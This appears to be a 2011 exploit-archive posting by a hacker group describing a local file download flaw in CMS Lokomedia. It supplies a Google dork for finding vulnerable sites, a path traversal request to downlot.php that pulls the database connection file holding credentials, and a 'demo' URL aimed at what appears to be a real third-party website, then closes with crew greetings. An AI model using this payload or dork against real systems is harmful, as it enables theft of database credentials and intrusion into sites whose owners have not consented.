[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CMS Loko Media Local File Download Vulnerability
# Published : 2011-03-18
# Author : Xr0b0t
# Previous Title : Shimbi CMS Multiple SQL Injection Vulnerabilities
# Next Title : EAFlashUpload v 2.5 File Arbitrary Upload


[!]===========================================================================[!]

[~] CMS Lokomedia Local File Download Vulnerability
[~] Author : Xr0b0t (xrt.interpol@gmx.us)
[~] Homepage : http://www.indonesiancoder.com | http://xrobot.mobi | http://mc-crew.net
[~] Date : 16 Mei, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://bukulokomedia.com/home
[+] Price : free
[+] Vulnerability : LFD
[+] Dork : inurl:"*.php?file=" ;)
[+] Version : all version 

[!]===========================================================================[!]

[ Vulnerable File ]
    http://127.0.0.1/path/downlot.php?file=[LFD]



[ XpL ]

    http://127.0.0.1/path/downlot.php?file=../config/koneksi.php




[ d3m0 ]

    http://www.saifulisnandar.web.id/downlot.php?file=../config/koneksi.php

etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] Don Tukulesto DUDUl Kok G rene2...
[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Geni212


[ NOTE ]

[+] OJOK JOTOS2an YO ..
[+] Minggir semua Arumbia Team Mau LEwat ;)
[+] MBEM : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x...
[+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..
[+] Malang Cyber Crew & Magelang Cyber Community